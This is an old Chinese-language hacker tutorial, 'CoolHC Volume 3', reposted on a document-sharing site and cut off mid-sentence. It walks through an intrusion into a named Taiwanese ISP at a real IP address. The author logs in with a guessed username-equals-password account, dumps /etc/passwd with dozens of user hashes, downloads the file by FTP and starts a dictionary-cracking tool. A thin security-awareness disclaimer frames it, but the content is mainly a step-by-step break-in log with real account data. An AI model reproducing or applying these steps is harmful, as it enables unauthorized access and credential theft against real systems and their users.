CoolHC Volume 3 By CoolFire.docx

CoolHC Volume 3 By CoolFire.docx

《CoolHC Volume 3 By CoolFire.docx》由会员分享，可在线阅读，更多相关《CoolHC Volume 3 By CoolFire.docx（10页珍藏版）》请在冰豆网上搜索。

CoolHCVolume3ByCoolFire

CoolHCVolume3ByCoolFire

这不是一个教学文件,只是告诉你该如何破解系统,好让你能够将自己的系统作安全的保护,如果你能够将这份文件完全看完,你就能够知道电脑骇客们是如何入侵你的电脑,我是CoolFire,写这篇文章的目的是要让大家明白电脑安全的重要性,并不是教人CrackPassword若有人因此文件导致恶意入侵别人的电脑或网路,本人概不负责!

!

前几次说到了NetCoffee店,还好他们没有提供客户拨接上线的功能,不然密码或是帐号被人盗用的客户不就糗大了!

但是CoolFire在这两周的探险中,为了找一个酷似网路咖啡站台的W3密码,误入一个号称第一个提供网路拨接的ISP,且在CoolFire顺利的抓回/etc/passwd之後,使用了自己写的PaSs2DiC+CJack来解出密码,没想到不用1分钟,就找出了9组ID与Password相同的密码,勿怪我没有在这里提醒大家,还好我没有找到rootpassword,不然可能该系统就此停摆,不可再见天日也!

（当然我不可能这麽作啦!

）.

看看最近兴起的网路咖啡及各大网站的系统安全设施,再加上CoolFire最近开会的时候遇到的情况,不难发现我们的国家正往高科技的领域快步迈进,但是这些系统的安全性若不加强,可能到时候人家只要一台电脑再加上一台数据机就可以让整个国家的金融及工商业崩溃!

大家要小心呀!

ISP是一般User拨接的源头,技术上理应比较强,但还是轻易让人入侵,且又没有教导User正确的网路使用观念（Password的设定及proxy的使用等）,实在不敢想像这样的网路发展到几年後会是甚麽样子?

?

这一次的说明还是没有谈到新的技巧,在James将首页更新後各位应该已经可以从中学到许多东西了,如果想要学习入侵,就一定要知道最新的资讯（入侵本国的网路则不用,反正没人重视网路安全.....真失望）,在别人还没将Bug修正之前就抢先一步拿到/etc/passwd,所以订阅一些网路安全的MailList是必要的,多看一些网安有关的NewsGroup也是必要的（不仅Hacker如此,ISP更要多注意这些资讯!

）.日後有空再整里一些MailList给大家!

!

本次主题:

说明如何连接该ISP并且对其/etc/passwd解码，连接位址:

.tw（203.66.169.11）特别说明:

由於本次主题说明重点使用真实的位址及名称,所以CoolFire已经Mail给该网页之维护人员更改密码,但该网页之ISP仍为新手之练习好题材!

CoolFireMail给该网页维护人员之信件内容如下,如果他还不尽快改掉,我也没办法了!

Mailsenttodhacme@.tw:

Subject:

请速更动网页密码

From:

CoolFire

你的网页作得不错,但是因为你所设定的密码太容易为骇客所入侵,请於见到此信後速速更改你的网页进入密码,否则下次若网页遭到篡改,本人概不负责!

!

****课程开始****

请注意:

由於本次所作的课程内容以实作为主,除了本人IP有所更改,一切都使用本人所用之Telnet软体Log档收录,故若道德感不佳者请勿阅读以下之详细破解内容,否则本人概不负责!

（连线到某一主机之後....此处的.tw是假的Domainname）

.tw>telnet.tw

Trying203.66.169.11...

Connectedto.tw.

Escapecharacteris'^]'.

Password:

（随便按一下Enter）

Loginincorrect

wwwlogin:

coffee（以Hacker的敏锐判断username=coffeepassword=coffee）

Password:

Lastlogin:

ThuJan910:

41:

52from.tw

欢迎光临.......以下略!

因涉及该ISP的名誉,大家自己去看吧!

=================================================================

（直接进入核心部份）

www:

~$cd/etc

www:

/etc$ls

DIR_COLORShosts.equivprintcap

HOSTNAMEhosts.lpdprofile

NETWORKINGinet@protocols

NNTP_INEWS_DOMAINinetd.confpsdevtab

X11@inittabrc.d/

at.denyinittab.gettyps.sampleresolv.conf

bootptabioctl.saverpc

csh.cshrcissuesecuretty

csh.loginsecuretty.old

default/klogd.pidsendmail.cf

diphostsld.so.cachesendmail.st

exportsld.so.confservices

fastbootlilo/shells

fdprmlilo.confshutdownpid

fs/localtimeskel/

fstabmagicslip.hosts

ftp.bannermail.rcslip.login

ftp.denymotdsnooptab

ftpaccessmotd.baksudoers

ftpconversionsmsgs/syslog.conf

ftpgroupsmtabsyslog.pid

ftpusersmtoolstermcap

gatewaysnamed.bootttys

gettydefsnetworksutmp@

groupnntpservervga/

host.confpasswdwtmp@

hostspasswd.OLDyp.conf.example

hosts.allowpasswd.old

hosts.denyppp/

（看看我们的目标长得如何?

?

?

）

www:

/etc$catpasswd

root:

abcdefghijklmn:

0:

0:

root:

/root:

/bin/bash

bin:

*:

1:

1:

bin:

/bin:

daemon:

*:

2:

2:

daemon:

/sbin:

adm:

*:

3:

4:

adm:

/var/adm:

lp:

*:

4:

7:

lp:

/var/spool/lpd:

sync:

*:

5:

0:

sync:

/sbin:

/bin/sync

shutdown:

*:

6:

0:

shutdown:

/sbin:

/sbin/shutdown

halt:

*:

7:

0:

halt:

/sbin:

/sbin/halt

mail:

*:

8:

12:

mail:

/var/spool/mail:

news:

*:

9:

13:

news:

/usr/lib/news:

uucp:

*:

10:

14:

uucp:

/var/spool/uucppublic:

operator:

*:

11:

0:

operator:

/root:

/bin/bash

games:

*:

12:

100:

games:

/usr/games:

man:

*:

13:

15:

man:

/usr/man:

postmaster:

*:

14:

12:

postmaster:

/var/spool/mail:

/bin/bash

nobody:

*:

-1:

100:

nobody:

/dev/null:

ftp:

*:

404:

1:

:

/home/ftp:

/bin/bash

guest:

*:

405:

100:

guest:

/dev/null:

/dev/null

shan:

Ca3LGA8gqDV4A:

501:

20:

ShanHuang:

/home/staff/shan:

/bin/bash

www:

/U5N5/l0B.jWo:

502:

20:

WWWManager:

/home/staff/www:

/bin/bash

test:

aFoIbr40sdbiSw:

503:

100:

test:

/home/test:

/bin/bash

fax:

aHhi5ZoJwWOGtc:

504:

100:

FAX_SERVICE:

/home/staff/fax:

/bin/bash

women:

IiO94G5YrrFfU:

505:

100:

PerfectWomen:

/home/w3/women:

/bin/bash

kanglin:

aMjy/8maF4ZPHA:

506:

100:

Kanglin:

/home/w3/kanglin:

/bin/bash

coffee:

AlwDa18Au9IPg:

507:

100:

Coffee:

/home/w3/coffee:

/bin/bash

bakery:

aFm7GUGCuyfP2w:

508:

100:

Bakery:

/home/w3/bakery:

/bin/bash

carven:

aPaqr3QAdw8zbk:

509:

100:

Carven:

/home/w3/carven:

/bin/bash

haurey:

/2m87VjXC742s:

510:

100:

Haurey:

/home/w3/haurey:

/bin/bash

prime:

nPOlsQhQFJ.aM:

511:

100:

Prime:

/home/w3/prime:

/bin/bash

tham:

H2AOlPozwIIuo:

512:

100:

xxxxxxxxxx:

/home/w3/tham:

/bin/bash

ccc:

aFiKAE2saiJCMo:

513:

100:

ccc:

/home/w3/ccc:

/bin/bash

sk:

UPrcTmnVSkd3w:

514:

100:

sk:

/home/sk:

/bin/bash

services:

9yBqHWfnnNr.k:

515:

100:

xxxx:

/home/w3/haurey/services:

/bin/bash

order:

LpnMHVjy9M/YU:

516:

100:

xxxx:

/home/w3/haurey/order:

/bin/bash

corey:

mhRsFO60hFsMU:

517:

100:

xxxx:

/home/w3/haurey/corey:

/bin/bash

richard:

EmUWnU6Bj7hQI:

519:

100:

richard:

/home/w3/richard:

/bin/bash

lilian:

Opx5xwctJTO1A:

520:

100:

lilian:

/home/w3/lilian:

/bin/bash

support:

JdOqvTZqdZ9wQ:

521:

100:

support:

/home/w3/support:

/bin/bash

hotline:

BiSzCJsDhVl7c:

522:

100:

hotline:

/home/w3/hotline:

/bin/bash

stonny:

/UNPsb9La4nwI:

523:

20:

:

/home/staff/stonny:

/bin/csh

bear:

w/eF/cZ32oMho:

524:

100:

bear:

/home/w3/bear:

/bin/bash

lance:

Pf7USG6iwgBEI:

525:

20:

Chien-chiaLan:

/home/staff/lance:

/bin/tcsh

taiwankk:

ijPWXFmRF79RY:

526:

100:

hotline:

/home/w3/taiwankk:

/bin/bash

service:

ulfWaOzIHC.M.:

527:

100:

primeservice:

/home/w3/service:

/bin/bash

liheng:

6hGixt6Kgezmo:

528:

100:

primeliheng:

/home/w3/liheng:

/bin/bash

caves:

RyvviMcWTTRnc:

529:

100:

gallery:

/home/w3/caves:

/bin/bash

sales:

CmtV4FZsBIPvQ:

518:

100:

prime:

/home/w3/prime/sales:

/bin/bash

kingtel:

8E7f0PIQWfCmQ:

530:

100:

kingtel:

/home/w3/kingtel:

/bin/bash

recycle1:

JgbZHVRE4Jf3U:

531:

100:

recycle1:

/home/w3/recycle1:

/bin/bash

recycle2:

Qg85xgdnsqJYM:

532:

100:

recycle2:

/home/w3/recycle2:

/bin/bash

recycle3:

XhyoUBFQspiS2:

533:

100:

recycle3:

/home/w3/recycle3:

/bin/bash

recycle:

109mNZYIZtNEM:

534:

100:

recycle:

/home/w3/recycle:

/bin/bash

hxnet:

KhB./jHw.XNUI:

536:

100:

hxnet:

/home/w3/hxnet:

/bin/bash

goodbook:

MlD0tx.urQMYc:

535:

100:

goodbook:

/home/w3/goodbook:

/bin/bash

sales1:

JmKzPOBMIIYUI:

537:

100:

sales1:

/home/w3/prime/sales1:

/bin/bash

rwu:

Pai8mYCRQwvcs:

539:

100:

rwu:

/home/w3/kingtel/rwu:

/bin/bash

charliex:

Of6HaxdxkDBDw:

540:

100:

charliex:

/home/w3/kingtel/charliex:

/bin/bash

jdlee:

Mhq3gZNup9E3Q:

538:

100:

jdlee:

/home/w3/kingtel/jdlee:

/bin/bash

tkchen:

GkTU8ecYIXEyw:

541:

100:

tkchen:

/home/w3/kingtel/tkchen:

/bin/bash

slb:

Olf22.gHBZ.QQ:

542:

100:

slb:

/home/w3/kingtel/slb:

/bin/bash

s6t4:

GnHFCPdZX7nkU:

543:

100:

s6t4:

/home/w3/kingtel/s6t4:

/bin/bash

lsh:

GftygyOntHY6Y:

545:

100:

lsh:

/home/w3/kingtel/lsh:

/bin/bash

lilly:

DhKHmlKPE6tRk:

544:

100:

lilly:

/home/w3/kingtel/lilly:

/bin/bash

nalcom:

MhHdQ1mvge9WQ:

546:

100:

nalcom:

/home/w3/prime/nalcom:

/bin/bash

jordon:

mPgNPVEkIEORM:

547:

100:

jordon:

/home/w3/jordon:

/bin/bash

toonfish:

wTscIuas4EeTE:

548:

100:

toonfish:

/home/w3/toonfish:

/bin/bash

yahoo:

If.UlNFTal.bk:

549:

100:

yahoo:

/home/w3/yahoo:

/bin/bash

basic:

IgLUu9J03lbyU:

550:

100:

basic:

/home/w3/basic:

/bin/bash

wunan:

QUHEiPefAaKsU:

551:

100:

xxxxxxxx:

/home/w3/wunan:

/bin/bash

kaoune:

eVwM44uTLOpnY:

552:

100:

kaoune:

/home/w3/wunan/kaoune:

/bin/bash

shuchuan:

KgPlk7TT6pmBk:

553:

100:

shuchuan:

/home/w3/wunan/shuchuan:

/bin/bash

fan:

Jk6E9PqP7xemg:

554:

100:

fan:

/home/w3/toonfish/fan:

/bin/bash

（CoolFire注:

因为使用PaSs2DiC很容易找出ID与Password相同的.故除了Coffee外,其它我找到密码的EnCodePassword部份皆改过.....除非你一个一个试啦~~~我没说喔!

）

www:

/etc$exit

logout

Connectionclosedbyforeignhost.

（可以走了!

!

改用FTP将/etc/passwd给抓回来吧!

）

.tw>ftp.tw

Connectedto.tw.

220-

220-欢迎光临.......以下略!

因涉及该ISP的名誉,大家自己去看吧!

220-

220-

220-Thereare0usersinFTPServernow.

220-目前已有0使用者在此Server上.

220-Ifyouhaveanysuggestion,pleasemailto:

220-service@xx.xxxxxxx.xxx.xx.

220-

220-

220-

220wwwFTPserver（Versionwu-2.4

（1）TueAug815:

50:

43CDT1995）ready.

（还是使用刚刚的帐号进入）

Name（.tw:

YourName）:

coffee

331Passwordrequiredforcoffee.

Password:

230Usercoffeeloggedin.

RemotesystemtypeisUNIX.

Usingbinarymodetotransferfiles.

（直接到达档案放置地点）

ftp>cd/etc

250CWDcommandsuccessful.

ftp>ls

200PORTcommandsuccessful.

150OpeningASCIImodedataconnectionforfilelist.

ttys

fdprm

group

issue

motd

mtools

profile

securetty

shells

termcap

skel

csh.cshrc

csh.login

lilo

inet

default

services

HOSTNAME

DIR_COLORS

passwd

passwd.OLD

wtmp

utmp

gettydefs

inittab.gettyps.sample

ld.so.conf

ld.so.cache

at.deny

fs

magic

rc.d

syslog.conf

printcap

inittab

sudoers

vga

diphosts

mail.rc

ppp

NNTP_INEWS_DOMAIN

sendmail.st

NETWORKING

gateways

bootptab

exports

ftpusers

host.conf

hosts

hosts.allow

hosts.deny

hosts.equiv

inetd.conf

named.boot

networks

nntpserver

protocols

resolv.conf

rpc

ftpaccess

hosts.lpd

ftpconversions

snooptab

msgs

ftpgroups

slip.login

slip.hosts

yp.conf.example

X11

lilo.conf

sendmail.cf

fstab

fastboot

mtab

syslog.pid

klogd.pid

shutdownpid

localtime

passwd.old

ioctl.save

psdevtab

ftp.banner

ftp.deny

motd.bak

securetty.old

226Transfercomplete.

（取回该档案）

ftp>getpasswd

200PORTcommandsuccessful.

150OpeningBINARYmodedataconnectionforpasswd（4081bytes）.

226Transfercomplete.

4081bytesreceivedin2.5seconds（1.6Kbytes/s）

（尽速离开）

ftp>bye

221Goodbye.

好了!

有了/etc/passwd之後一切都好办了,赶紧将你的宝贝收藏PaSs2DiC拿出来吧!

!

快点跑一下,让它自动产生字典档案:

C:

\hack>pass2dic

PaSs2DiCV0.2（C）1996ByFETAGSoftwareDevelopmentCo.R.O.C.TAIWAN.

Thistoolwill:

[1]LoadPASSWDfileandconvertittoonlyusernametextfile

[2]Writethefiletoadictionaryfileyouchoisefortarget

YourSourcePASSWDFileName:

passwd

YourTargetDictionaryName:

dic.cfe

PaSs2DiCAuthor:

JamesLinE-Mail:

fetag@.tw

FETAGSoftwareDevelopmentCo:

.tw/~fetag

C:

\hack>

（这样就好了!

自动产生的档案会放在dic.cfe这个档案中,咱们跑一下B